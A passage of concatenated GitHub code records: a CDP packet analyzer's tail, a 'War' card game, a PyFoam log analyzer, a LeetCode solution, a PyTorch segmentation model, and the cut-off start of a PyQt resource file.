     i += 1\n\nelse:\n    \n    for pkt in cap:\n        print(\"\\033[1;34m[*]\\033[0m Packet \" + str(i) + \" :\")\n        print(\"\")\n        \n        if \"deviceid\" in str(pkt.cdp.field_names):\n            print(\"Device ID: \" + pkt.cdp.deviceid)\n        \n        if \"software_version\" in str(pkt.cdp.field_names):\n            print(\"Software Version: \" + pkt.cdp.software_version)\n\n        if \"platform\" in str(pkt.cdp.field_names):\n            print(\"Platform: \" + pkt.cdp.platform)\n\n        if \"nrgyz_ip_address\" in str(pkt.cdp.field_names):\n            print(\"IP-Address: \" + pkt.cdp.nrgyz_ip_address)\n\n        if \"portid\" in str(pkt.cdp.field_names):\n            print(\"Port ID: \" + pkt.cdp.portid)\n\n        if \"cluster_switch_mac\" in str(pkt.cdp.field_names):\n            print(\"Switch MAC: \" + pkt.cdp.cluster_switch_mac)\n\n        if \"cluster_management_vlan\" in str(pkt.cdp.field_names):\n            print(\"Management VLAN: \" + pkt.cdp.cluster_management_vlan)\n\n        if \"vtp_management_domain\" in str(pkt.cdp.field_names):\n            print(\"VTP Domain: \" + pkt.cdp.vtp_management_domain)\n\n        if \"native_vlan\" in str(pkt.cdp.field_names):\n            print(\"Native VLAN: \" + pkt.cdp.native_vlan)\n\n        if \"voice_vlan\" in str(pkt.cdp.field_names):\n            print(\"VoIP VLAN: \" + pkt.cdp.voice_vlan)\n\n\n        print(\"\")\n        print(\"\")\n        print(\"\")\n        i += 1\n\n","repo_name":"SySS-Research/WireBug","sub_path":"tools/SaCLaC/cdpanalyze.py","file_name":"cdpanalyze.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"67"} +{"seq_id":"8274412323","text":"#####################################\n### WELCOME TO YOUR OOP PROJECT #####\n#####################################\n\n# For this project you will be using OOP to create a 
card game. This card game will\n# be the card game \"War\" for two players, you and the computer. If you don't know\n# how to play \"War\" here are the basic rules:\n#\n# The deck is divided evenly, with each player receiving 26 cards, dealt one at a time,\n# face down. Anyone may deal first. Each player places his stack of cards face down,\n# in front of him.\n#\n# The Play:\n#\n# Each player turns up a card at the same time and the player with the higher card\n# takes both cards and puts them, face down, on the bottom of his stack.\n#\n# If the cards are the same rank, it is War. Each player turns up three cards face\n# down and one card face up. The player with the higher cards takes both piles\n# (six cards). If the turned-up cards are again the same rank, each player places\n# another card face down and turns another card face up. The player with the\n# higher card takes all 10 cards, and so on.\n#\n# There are some more variations on this but we will keep it simple for now.\n# Ignore \"double\" wars\n#\n# https://en.wikipedia.org/wiki/War_(card_game)\n\nfrom random import shuffle\n\n# Two useful variables for creating Cards.\nSUITE = 'H D S C'.split()\nRANKS = '2 3 4 5 6 7 8 9 10 J Q K A'.split()\n\nclass Deck:\n    \"\"\"\n    This is the Deck Class. This object will create a deck of cards to initiate\n    play. You can then use this Deck list of cards to split in half and give to\n    the players. It will use SUITE and RANKS to create the deck. It should also\n    have a method for splitting/cutting the deck in half and Shuffling the deck.\n    \"\"\"\n    def __init__(self):\n        print(\"Created a new deck of cards\")\n        self.allcards = [(s,r) for s in SUITE for r in RANKS ]\n\n    def shuffle(self):\n        print(\"shuffling the cards\")\n        shuffle(self.allcards)\n    def split_in_half(self):\n        return (self.allcards[:26], self.allcards[26:])\n\n\nclass Hand:\n    '''\n    This is the Hand class. Each player has a Hand, and can add or remove\n    cards from that hand. There should be an add and remove card method here.\n    '''\n    def __init__(self,cards):\n        self.cards = cards\n\n    def __str__(self):\n        return \"Holds {} cards\".format(len(self.cards))\n\n    def add(self,added_cards):\n        self.cards.extend(added_cards)\n\n    def remove_card(self):\n        return self.cards.pop()\n\n\nclass Player:\n    \"\"\"\n    This is the Player class, which takes in a name and an instance of a Hand\n    class object. 
The Player can then play cards and check if they still have cards.\n    \"\"\"\n    def __init__(self,name,hand):\n        self.name = name\n        self.hand = hand\n\n    def play_card(self):\n        drawn_card = self.hand.remove_card()\n        print(\"{} played: {}\".format(self.name,drawn_card))\n        print(\"\\n\")\n        return drawn_card\n\n    def remove_war_cards(self):\n        # draw up to three face-down war cards (the original returned the hand's own\n        # list without removing the cards, which duplicated them on resolution)\n        war_cards = []\n        for x in range(min(3, len(self.hand.cards))):\n            war_cards.append(self.hand.remove_card())\n        return war_cards\n\n    def nadal_ma_karty(self):\n        \"\"\"\n        Returns True if the player still has cards\n        \"\"\"\n        return len(self.hand.cards) !=0\n\n\n\n######################\n#### GAME PLAY #######\n######################\nprint(\"Welcome to War, let's begin...\")\n\n# create the deck and split it in half:\ntalia = Deck()\ntalia.shuffle()\npolowa1,polowa2 = talia.split_in_half()\n\n# create both players\ncomp = Player(\"computer\",Hand(polowa1))\n\nname = input(\"what is your name ?\")\nuser=Player(name,Hand(polowa2))\n\ntotal_rounds = 0\nwar_count = 0\n\nwhile user.nadal_ma_karty() and comp.nadal_ma_karty():\n    total_rounds+=1\n    print(\"New round!\")\n    print(\"score:\")\n    print(user.name +\" has cards: \" + str(len(user.hand.cards)))\n    print(comp.name +\" has cards: \" + str(len(comp.hand.cards)))\n    print(\"play a card\")\n    print('\\n')\n\n    table_cards = []\n    computer_card = comp.play_card()\n    player_card = user.play_card()\n\n    table_cards.append(computer_card)\n    table_cards.append(player_card)\n\n    if computer_card[1]== player_card[1]:\n        war_count +=1\n        print(\"war!\")\n\n        table_cards.extend(user.remove_war_cards())\n        table_cards.extend(comp.remove_war_cards())\n\n        # the tied cards cannot decide the war, so draw fresh face-up cards\n        # (the original compared the equal cards again, so one side always won wars)\n        if user.nadal_ma_karty() and comp.nadal_ma_karty():\n            computer_card = comp.play_card()\n            player_card = user.play_card()\n            table_cards.append(computer_card)\n            table_cards.append(player_card)\n\n    if RANKS.index(computer_card[1]) < RANKS.index(player_card[1]):\n        user.hand.add(table_cards)\n    else:\n        comp.hand.add(table_cards)\n\n\n\nprint(\"game over , number of rounds: \" + str(total_rounds))\nprint(\"War happened \" + str(war_count) + \" times\")\nprint(\"does the computer still have cards?\")\nprint(str(comp.nadal_ma_karty()))\nprint(\"does the player still have cards?\")\nprint(str(user.nadal_ma_karty()))","repo_name":"RobertJastrzebski/Training","sub_path":"Python/small programs/program_5-war/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285176873","text":"# ICE Revision: $Id$\n\"\"\"Check for Execution-Time information\"\"\"\n\nimport re\n\ndef executionRegexp():\n    \"\"\"@Return: The regular expression that parses the execution time\n    depending on the OpenFOAM-Version\"\"\"\n\n    if foamVersionNumber(useConfigurationIfNoInstallation=True)>=(1,3):\n        return \"^ExecutionTime = (.+) s .ClockTime = (.+) s$\"\n    else:\n        return \"^ExecutionTime = (.+) s$\"\n\n# from FileLineAnalyzer import FileLineAnalyzer\n# from TimeLineLineAnalyzer import TimeLineLineAnalyzer\n\nfrom .GeneralLineAnalyzer import GeneralLineAnalyzer\n\nfrom PyFoam.FoamInformation import foamVersionNumber\nfrom PyFoam.Error import warning\n\nclass GeneralExecutionLineAnalyzer(GeneralLineAnalyzer):\n    \"\"\"Parses lines for the execution time\"\"\"\n\n    def __init__(self,\n                 doTimelines=True,\n                 doFiles=True,\n                 singleFile=False,\n                 startTime=None,\n                 endTime=None):\n        self.hasClock=(foamVersionNumber(useConfigurationIfNoInstallation=True)>=(1,3))\n        titles=[\"cumulated\"]\n        if self.hasClock:\n            titles.append(\"delta\")\n\n        GeneralLineAnalyzer.__init__(self,\n                                     
titles=titles,\n doTimelines=doTimelines,\n doFiles=doFiles,\n singleFile=singleFile,\n startTime=startTime,\n endTime=endTime)\n\n self.exp=re.compile(executionRegexp())\n self.registerRegexp(self.exp)\n\n self.resetFile()\n\n def resetFile(self):\n self.lastTime=0.\n self.time=0.\n if self.hasClock:\n self.lastClock=0.\n self.clock=0.\n\n self.first=True;\n self.firstTime=0.\n if self.hasClock:\n self.firstClock=0.\n\n def startAnalysis(self,match):\n try:\n self.time=float(match.group(1))\n\n # clear phase (if set) so that function objects don't append a phase name\n self.setPhase()\n\n except ValueError:\n warning(match.group(1),\"is not a valid number\")\n self.time=float(\"NaN\")\n if self.hasClock:\n try:\n self.clock=float(match.group(2))\n except ValueError:\n warning(match.group(2),\"is not a valid number\")\n self.clock=float(\"NaN\")\n\n def endAnalysis(self,match):\n self.lastTime = self.time\n if self.first:\n self.firstTime=self.time\n\n if self.hasClock:\n self.lastClock = self.clock\n if self.first:\n self.firstClock=self.clock\n\n self.first=False\n\n def addToFiles(self,match):\n self.files.write(\"executionTime\",self.parent.getTime(),(self.time,self.time-self.lastTime))\n\n if self.hasClock:\n self.files.write(\"wallClockTime\",self.parent.getTime(),(self.clock,self.clock-self.lastClock))\n\n def addToTimelines(self,match):\n self.lines.setValue(\"cpu\",self.time-self.lastTime)\n\n if self.hasClock:\n self.lines.setValue(\"clock\",self.clock-self.lastClock)\n\n def clockFirst(self):\n \"\"\"Returns the Wall-Clock-Time of the first timestep\"\"\"\n if self.hasClock:\n return self.firstClock\n else:\n return None\n\n def clockTotal(self):\n \"\"\"Returns the total Wall-Clock-Time\"\"\"\n if self.hasClock:\n return self.clock\n else:\n return None\n\n def timeFirst(self):\n \"\"\"Returns the CPU-Time of the first timestep\"\"\"\n return self.firstTime\n\n def timeTotal(self):\n \"\"\"Returns the total CPU-Time\"\"\"\n return self.time\n\n\nclass ExecutionTimeLineAnalyzer(GeneralExecutionLineAnalyzer):\n \"\"\"Parses lines for the execution time\"\"\"\n\n def __init__(self):\n GeneralExecutionLineAnalyzer.__init__(self,doTimelines=False)\n\n## self.exp=re.compile(executionRegexp())\n## self.lastTime=0.\n\n## def doAnalysis(self,line):\n## \"\"\"Writes total execution time and time needed since last\n## time-step\"\"\"\n## m=self.exp.match(line)\n## if m!=None:\n## time=float(m.group(1))\n\n## self.files.write(\"executionTime\",self.parent.getTime(),(time,time-self.lastTime))\n\n## self.lastTime = time\n\nclass TimeLineExecutionTimeLineAnalyzer(GeneralExecutionLineAnalyzer):\n \"\"\"Parses lines for the execution time\"\"\"\n\n def __init__(self):\n GeneralExecutionLineAnalyzer.__init__(self,doFiles=False)\n\n## self.hasClock=(foamVersionNumber()>=(1,3))\n\n## self.exp=re.compile(executionRegexp())\n\n## self.lastTime=0.\n## if self.hasClock:\n## self.lastClock=0.\n\n## def doAnalysis(self,line):\n## \"\"\"Writes total execution time and time needed since last\n## time-step\"\"\"\n## m=self.exp.match(line)\n## if m!=None:\n## time=float(m.group(1))\n## if self.hasClock:\n## clock=float(m.group(2))\n\n## self.lines.setValue(\"cpu\",time-self.lastTime)\n## self.lastTime = time\n\n## if self.hasClock:\n## self.lines.setValue(\"clock\",clock-self.lastClock)\n## self.lastClock = clock\n\n\n\n# Should work with Python3 and 
Python2\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/LogAnalysis/ExecutionTimeLineAnalyzer.py","file_name":"ExecutionTimeLineAnalyzer.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"12615241105","text":"class Solution:\n def trap(self, height: List[int]) -> int:\n if not height: return 0\n\n lp = 0\n rp = len(height) - 1\n res = 0\n maxL = height[lp]\n maxR = height[rp]\n\n while lp < rp:\n if maxL < maxR:\n lp += 1\n maxL = max(maxL, height[lp])\n res += maxL - height[lp]\n else:\n rp -= 1 \n maxR = max(maxR, height[rp])\n res += maxR - height[rp]\n return res\n","repo_name":"Elliott-Chong/LeetCode","sub_path":"13-Trapping Rain Water/solution-1.py","file_name":"solution-1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"70547613992","text":"# BGANet code\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch_dct as dct\n\nimport kornia.filters.sobel as sobel_filter\n\nfrom IS2D_models import load_backbone_model\n\nclass SubDecoder(nn.Module):\n def __init__(self, in_channels, num_classes, scale_factor):\n super(SubDecoder, self).__init__()\n\n self.subdecoder = nn.Sequential(\n nn.Upsample(scale_factor=scale_factor, mode='bilinear', align_corners=True),\n nn.Conv2d(in_channels, num_classes, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0)))\n\n def forward(self, x):\n return self.subdecoder(x)\n\nclass RFB_S(nn.Module):\n def __init__(self, in_channels):\n super(RFB_S, self).__init__()\n\n self.branch1 = nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, padding=0)\n self.branch2 = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=3, dilation=3)\n self.branch3 = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=5, dilation=5)\n self.branch4 = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=7, dilation=7)\n\n self.conv1x1 = nn.Sequential(\n nn.Conv2d(in_channels * 4, 1, kernel_size=1, stride=1, padding=0),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n\n att_map = self.conv1x1(torch.cat([branch1, branch2, branch3, branch4], dim=1))\n\n return att_map\n\nclass RFB_C(nn.Module):\n def __init__(self, in_channels):\n super(RFB_C, self).__init__()\n\n self.branch1 = nn.Conv1d(in_channels, in_channels, kernel_size=1, stride=1, padding=0)\n self.branch2 = nn.Conv1d(in_channels, in_channels, kernel_size=3, stride=1, padding=3, dilation=3)\n self.branch3 = nn.Conv1d(in_channels, in_channels, kernel_size=3, stride=1, padding=5, dilation=5)\n self.branch4 = nn.Conv1d(in_channels, in_channels, kernel_size=3, stride=1, padding=7, dilation=7)\n\n self.conv = nn.Sequential(\n nn.Conv1d(in_channels * 4, in_channels, kernel_size=1, stride=1, padding=0),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n x = x.squeeze(dim=2)\n branch1 = self.branch1(x)\n branch2 = self.branch2(x)\n branch3 = self.branch3(x)\n branch4 = self.branch4(x)\n\n att_map = self.conv(torch.cat([branch1, branch2, branch3, branch4], dim=1))\n\n return att_map.unsqueeze(dim=2)\n\nclass UpsampleBlock(nn.Module):\n def __init__(self, in_channels, out_channels, skip_connection_channels, group=1):\n super(UpsampleBlock, self).__init__()\n self.group = group\n self.average_channel_pooling = nn.AdaptiveAvgPool2d(1)\n 
self.conv1x1_channel = RFB_C(in_channels=out_channels)\n self.conv1x1_spatial = RFB_S(in_channels=1)\n\n in_group_channels = int(in_channels // self.group)\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_group_channels, 1, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0)),\n nn.Sigmoid())\n\n in_channels = in_channels + skip_connection_channels\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\n nn.BatchNorm2d(out_channels), nn.ReLU())\n\n self.conv3 = nn.Sequential(\n nn.Conv2d(out_channels, out_channels, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),\n nn.BatchNorm2d(out_channels), nn.ReLU(inplace=True))\n\n self.count = 1\n\n def forward(self, x, skip_connection=None, boundary_guide=None, viz=False):\n x = F.interpolate(x, size=None, scale_factor=2, mode='bilinear', align_corners=None)\n B, C, H, W = x.size()\n\n group_att_map_list = []\n for idx in range(self.group):\n group_x = x[:, int(C // self.group) * idx:int(C // self.group) * (idx + 1)]\n group_att_map = self.conv1(group_x)\n group_att_map_list.append(group_att_map)\n group_att_map = torch.mean(torch.cat(group_att_map_list, dim=1), dim=1, keepdim=True)\n x_for = x * group_att_map + x\n x = torch.cat([x_for, skip_connection], dim=1)\n x = self.conv2(x)\n\n if boundary_guide is not None:\n B, C, _, _ = boundary_guide.size()\n boundary_channel_descriptor = self.conv1x1_channel(self.average_channel_pooling(boundary_guide))\n x += boundary_channel_descriptor\n\n boundary_spatial_descriptor = self.conv1x1_spatial(torch.mean(boundary_guide, dim=1, keepdim=True))\n x += boundary_spatial_descriptor\n x = self.conv3(x)\n\n return x\n\nclass DCTFreqUNet(nn.Module):\n def __init__(self,\n num_classes=1,\n group=2,\n inter_channels=2048,\n backbone_name='res2net50_v1b_26w_4s',\n decoder_filters=(256, 128, 64, 32),\n parametric_upsampling=False,\n shortcut_features='default',\n decoder_use_batchnorm=True):\n super(DCTFreqUNet, self).__init__()\n\n self.backbone_name = backbone_name\n self.backbone = load_backbone_model(self.backbone_name, pretrained=True)\n\n self.conv1x1 = nn.Sequential(\n nn.Conv2d(inter_channels, 1, kernel_size=(1, 1), stride=(1, 1), padding=(0, 0)),\n nn.ReLU(inplace=True))\n\n shortcut_chs, bb_out_chs = self.infer_skip_channels()\n if shortcut_features != 'default':\n self.shortcut_features = shortcut_features\n\n self.low_upsample_block1 = UpsampleBlock(bb_out_chs, decoder_filters[0],\n skip_connection_channels=shortcut_chs[3],\n group=group)\n self.low_upsample_block2 = UpsampleBlock(decoder_filters[0], decoder_filters[1],\n skip_connection_channels=shortcut_chs[2],\n group=group)\n self.low_upsample_block3 = UpsampleBlock(decoder_filters[1], decoder_filters[2],\n skip_connection_channels=shortcut_chs[1],\n group=group)\n self.low_upsample_block4 = UpsampleBlock(decoder_filters[2], decoder_filters[3],\n skip_connection_channels=shortcut_chs[0],\n group=group)\n\n self.high_upsample_block1 = UpsampleBlock(bb_out_chs, decoder_filters[0],\n skip_connection_channels=shortcut_chs[3],\n group=group)\n self.high_upsample_block2 = UpsampleBlock(decoder_filters[0], decoder_filters[1],\n skip_connection_channels=shortcut_chs[2],\n group=group)\n self.high_upsample_block3 = UpsampleBlock(decoder_filters[1], decoder_filters[2],\n skip_connection_channels=shortcut_chs[1],\n group=group)\n self.high_upsample_block4 = UpsampleBlock(decoder_filters[2], decoder_filters[3],\n skip_connection_channels=shortcut_chs[0],\n group=group)\n\n self.low_stage1_conv = 
SubDecoder(decoder_filters[0], num_classes, scale_factor=16)\n        self.low_stage2_conv = SubDecoder(decoder_filters[1], num_classes, scale_factor=8)\n        self.low_stage3_conv = SubDecoder(decoder_filters[2], num_classes, scale_factor=4)\n        self.low_stage4_conv = SubDecoder(decoder_filters[3], num_classes, scale_factor=2)\n\n        self.high_stage1_conv = SubDecoder(decoder_filters[0], num_classes, scale_factor=16)\n        self.high_stage2_conv = SubDecoder(decoder_filters[1], num_classes, scale_factor=8)\n        self.high_stage3_conv = SubDecoder(decoder_filters[2], num_classes, scale_factor=4)\n        self.high_stage4_conv = SubDecoder(decoder_filters[3], num_classes, scale_factor=2)\n\n    def forward(self, x, mode='train'):\n        features, x = self.backbone.forward_feature(x)\n\n        x_dct = dct.dct_2d(x)\n        x_compress = self.conv1x1(x)\n        x_dct_compress = dct.dct_2d(x_compress)\n        x_dct_compress = (x_dct_compress - torch.mean(x_dct_compress, dim=(2, 3), keepdim=True)) / torch.std(x_dct_compress, dim=(2, 3), keepdim=True)\n        low_mask = (torch.sigmoid(x_dct_compress) >= 0.5).type(torch.int)\n\n        x_dct_low = x_dct * low_mask\n        x_dct_high = x_dct * (1 - low_mask)\n\n        x_dct_low = dct.idct_2d(x_dct_low)\n        x_dct_high = dct.idct_2d(x_dct_high)\n\n        x_dct_high1 = self.high_upsample_block1(x_dct_high, features[-1])\n        x_dct_high2 = self.high_upsample_block2(x_dct_high1, features[-2])\n        x_dct_high3 = self.high_upsample_block3(x_dct_high2, features[-3])\n        x_dct_high4 = self.high_upsample_block4(x_dct_high3, features[-4])\n\n        x_dct_low1 = self.low_upsample_block1(x_dct_low, features[-1], x_dct_high1)\n        x_dct_low2 = self.low_upsample_block2(x_dct_low1, features[-2], x_dct_high2)\n        x_dct_low3 = self.low_upsample_block3(x_dct_low2, features[-3], x_dct_high3, viz=True)\n        x_dct_low4 = self.low_upsample_block4(x_dct_low3, features[-4], x_dct_high4)\n\n        edge_stage1 = self.high_stage1_conv(x_dct_high1)\n        edge_stage2 = self.high_stage2_conv(x_dct_high2)\n        edge_stage3 = self.high_stage3_conv(x_dct_high3)\n        edge_stage4 = self.high_stage4_conv(x_dct_high4)\n\n        region_stage1 = self.low_stage1_conv(x_dct_low1)\n        region_stage2 = self.low_stage2_conv(x_dct_low2)\n        region_stage3 = self.low_stage3_conv(x_dct_low3)\n        region_stage4 = self.low_stage4_conv(x_dct_low4)\n\n        if mode=='train':\n            return [region_stage1, region_stage2, region_stage3, region_stage4], \\\n                   [edge_stage1, edge_stage2, edge_stage3, edge_stage4]\n        else:\n            return region_stage4\n\n    def _calculate_criterion(self, criterion, y_pred, y_true, mode):\n        if mode=='train':\n            edge_true = sobel_filter(y_true)\n            edge_true[edge_true >= 0.5] = 1; edge_true[edge_true < 0.5] = 0\n\n            region_loss, edge_loss = 0, 0\n            for region_pred, edge_pred in zip(y_pred[0], y_pred[1]):\n                region_loss += self.structure_loss(region_pred, y_true)\n                edge_loss += criterion(edge_pred, edge_true)\n\n            loss = region_loss + edge_loss\n        else:\n            loss = criterion(y_pred, y_true)\n\n        return loss\n\n    def similarity_loss(self, low_freq, high_freq):\n        low_freq, high_freq = low_freq.squeeze(), high_freq.squeeze()\n        # self.cos was never defined; use the functional cosine similarity instead\n        cos_loss = torch.sum(torch.abs(F.cosine_similarity(low_freq, high_freq)))\n\n        return cos_loss\n\n    def structure_loss(self, pred, mask):\n        weit = 1 + 5 * torch.abs(F.avg_pool2d(mask, kernel_size=31, stride=1, padding=15) - mask)\n        wbce = F.binary_cross_entropy_with_logits(pred, mask, reduction='none') # keep per-pixel losses ('reduce' is deprecated)\n        wbce = (weit * wbce).sum(dim=(2, 3)) / weit.sum(dim=(2, 3))\n\n        pred = torch.sigmoid(pred)\n        inter = ((pred * mask) * weit).sum(dim=(2, 3))\n        union = ((pred + mask) * weit).sum(dim=(2, 3))\n        wiou = 1 - (inter + 1) / (union - inter + 1)\n        return (wbce + 
wiou).mean()\n\n def infer_skip_channels(self):\n x = torch.zeros(1, 3, 224, 224)\n\n [x, x1, x2, x3], x4 = self.backbone.forward_feature(x)\n channels, out_channels = [x.shape[1], x1.shape[1], x2.shape[1], x3.shape[1], x4.shape[1]], x4.shape[1]\n\n return channels, out_channels\n\nif __name__=='__main__':\n model = DCTFreqUNet(num_classes=1)\n inp = torch.randn(2, 3, 256, 256)\n oup = model(inp, mode='val')\n print(oup.shape)","repo_name":"skawngus1111/BGANet","sub_path":"IS2D_models/DCTFreqUNet.py","file_name":"DCTFreqUNet.py","file_ext":"py","file_size_in_byte":12025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12570861487","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.12.1)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\xc5\\xf8\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x01\\xdb\\x00\\x00\\x01\\x76\\x08\\x06\\x00\\x00\\x00\\x26\\xf8\\x32\\x04\\\n\\x00\\x00\\x20\\x00\\x49\\x44\\x41\\x54\\x78\\x9c\\xec\\xdd\\x79\\xbc\\x1d\\x75\\\n\\x9d\\xe7\\xff\\x67\\xd5\\x3d\\xb9\\xdc\\xdc\\x84\\x4b\\x08\\x21\\x84\\x10\\x20\\\n\\x84\\x10\\x42\\x08\\x21\\x61\\x0d\\x8b\\x91\\xdd\\xa8\\x88\\x82\\x1b\\xd2\\x6e\\\n\\x6d\\x6b\\xab\\x6d\\x3b\\x8e\\xc3\\xf4\\xd0\\x3e\\x18\\x7f\\x0e\\x0f\\x7e\\x8e\\\n\\x0f\\x9a\\x1f\\xc3\\xaf\\xed\\x76\\x1c\\xc6\\xe9\\xd6\\x5e\\x46\\x7f\\x2e\\xa3\\\n\\xb6\\xe3\\x28\\xda\\x2e\\x80\\xb2\\x88\\x88\\x88\\xec\\x22\\x6b\\xd8\\x43\\x48\\\n\\x42\\x08\\xc9\\xcd\\xcd\\xa9\\xdf\\x1f\\xdf\\x53\\xde\\x93\\x4a\\x55\\x9d\\x73\\\n\\x43\\xb6\\x7b\\xef\\xf7\\xf5\\x78\\xdc\\xc7\\x3d\\xa7\\xea\\x5b\\xcb\\x39\\xa7\\\n\\xaa\\xde\\xdf\\xcf\\xf2\\xfd\\x7c\\x89\\x44\\x22\\xbb\\x8a\\x14\\x53\\x13\\xae\\\n\\xc0\\x33\\xb8\\x1c\\x53\\x77\\xed\\x29\\x45\\x22\\x91\\x48\\x24\\x32\\x76\\xe8\\\n\\xc5\\xdb\\x70\\xef\\x7e\\x6c\\x7e\\x2d\\xd9\\x7e\\x6c\\xc6\\xa3\\x09\\x7f\\x8e\\\n\\xfe\\x5d\\x7b\\x7a\\x91\\x48\\x64\\x7b\\x92\\xec\\xea\\x13\\x88\\x44\\xc6\\x19\\\n\\x29\\x16\\xe2\\x53\\x7d\\x2c\\x3f\\x85\\xfe\\xa5\\x98\\x80\\x26\\x7e\\x8d\\x1b\\\n\\x18\\x5a\\xc3\\x5d\\x09\\x97\\x67\\x7c\\x17\\x83\\xbb\\xf0\\x7c\\x23\\x91\\xc8\\\n\\x76\\x20\\x8a\\x6d\\x24\\xb2\\xf3\\x98\\x8a\\x3f\\x4b\\xf9\\xc8\\x7c\\xa6\\x9f\\\n\\x49\\x3a\\x4d\\x30\\x67\\x73\\x52\\x6c\\xc4\\xcd\\xf8\\x05\\x1b\\x5e\\xe6\\x06\\\n\\x7c\\x1a\\x37\\x61\\x68\\xa7\\x9f\\x71\\x24\\x12\\xd9\\x2e\\x44\\xb1\\x8d\\x44\\\n\\x76\\x3c\\x0d\\xbc\\x0e\\x97\\xee\\xcb\\x31\\x67\\xd0\\x38\\x5c\\xb8\\xf9\\xb2\\\n\\xb6\\xff\\xed\\xf4\\x60\\x35\\xae\\xa7\\x79\\x17\\x6b\\x07\\xf9\\x76\\xc2\\xdf\\\n\\x64\\xdc\\x29\\x8a\\x6e\\x24\\x32\\xea\\x88\\x62\\x1b\\x89\\xec\\x38\\x52\\xcc\\\n\\xc5\\xa5\\x7d\\x5c\\x70\\x3c\\x93\\x4f\\xc6\\x44\\xc1\\x65\\x5c\\xbc\\xf9\\x8a\\\n\\xc2\\x9b\\xb4\\xfe\\x9e\\xc4\\xf5\\x78\\x90\\x27\\x37\\xf3\\xcf\\xb8\\x06\\x8f\\\n\\xb4\\x76\\x13\\x89\\x44\\x46\\x01\\x3d\\xbb\\xfa\\x04\\x22\\x91\\x31\\xca\\x54\\\n\\xbc\\x2f\\xe1\\xbf\\xcd\\x65\\xd9\\x05\\xf4\\x1e\\x2d\\xdc\\x70\\xed\\x62\\xca\\\n\\x96\\x56\\x6d\\xd2\\xf6\\x3f\\x6b\\xfd\\x0d\\xe0\\x48\\xcc\\x64\\xcf\\xd5\\x9c\\\n\\xb4\\x8e\\xe5\\x59\\x48\\xb0\\x7a\\x18\\xeb\\x6d\\x6d\\x18\\x47\\x22\\x91\\xdd\\\n\\x8c\\x68\\xd9\\x46\\x22\\xdb\\x97\\x5e\\x9c\\x9a\\x70\\xe9\\x14\\x96\\x2d\\xa3\\\n\\xb1\\xb8\\xb5\\xa2\\x5d\\x64\\x8b\\x82\\xdb\\xbe\\xbe\\x7d\\x79\\xbb\\xb5\\x9b\\\n\\x62\\x13\\x7e\\x8b\\x9b\\x19\\x5a\\xc9\\x1d\\x19\\x57\\x0b\\x4
9\\x54\\x6b\\xb7\\\n\\xff\\x47\\x89\\x44\\x22\\xdb\\x8b\\x28\\xb6\\x91\\xc8\\xf6\\x21\\xc5\\x6c\\x7c\\\n\\x6c\\x0f\\xde\\xbd\\x90\\x29\\xa7\\x63\\x4f\\x21\\x01\\xaa\\xea\\x46\\x2b\\x13\\\n\\xdd\\xaa\\x76\\xb9\\xe8\\xf6\\x08\\xe6\\xec\\xad\\xb8\\x8d\\xc1\\x17\\xb9\\x0e\\\n\\x57\\xe2\\xe7\\xd8\\xf0\\x0a\\x3e\\x43\\x24\\x12\\xd9\\x41\\x44\\xb1\\x8d\\x44\\\n\\x5e\\x39\\x03\\x78\\x4b\\xca\\x5f\\x1c\\xc0\\xbc\\xb3\\x49\\x67\\x1b\\xce\\x62\\\n\\x2a\\x4b\\x80\\xca\\x97\\xb7\\xd3\\x2e\\xa8\\x45\\xeb\\xb7\\x68\\xf5\\x66\\x42\\\n\\xd6\\xd5\\x0b\\xf8\\x19\\xee\\x62\\xdd\\x06\\xbe\\x2d\\x88\\xee\\x3d\\x62\\x12\\\n\\x55\\x24\\xb2\\x5b\\x11\\xc5\\x36\\x12\\xd9\\x76\\x1a\\x38\\x26\\xe1\\x53\\x93\\\n\\x39\\xeb\\x64\\x7a\\x4f\\xb4\\xa5\\x60\\xd6\\x51\\xe5\\x56\\x6e\\xdf\\xb6\\x6c\\\n\\x3f\\x45\\x31\\x9e\\x80\\xa7\\xf0\\x23\\x3c\\xc4\\xea\\x21\\xbe\\x84\\xbf\\xc6\\\n\\x63\\x62\\x12\\x55\\x24\\xb2\\x5b\\x10\\xc5\\x36\\x12\\x19\\x39\\x29\\xa6\\xe1\\\n\\x63\\x3d\\xfc\\xd9\\x02\\xa6\\x9c\\x8d\\x29\\x82\\x39\\x59\\xe7\\x32\\xae\\x13\\\n\\xd1\\xaa\\xb6\\x9d\\x68\\x17\\xdd\\x07\\xf1\\x43\\x3c\\xc3\\x8a\\x66\\x88\\xe7\\\n\\x7e\\x49\\x18\\x45\\x14\\x45\\x37\\x12\\xd9\\x85\\x44\\xb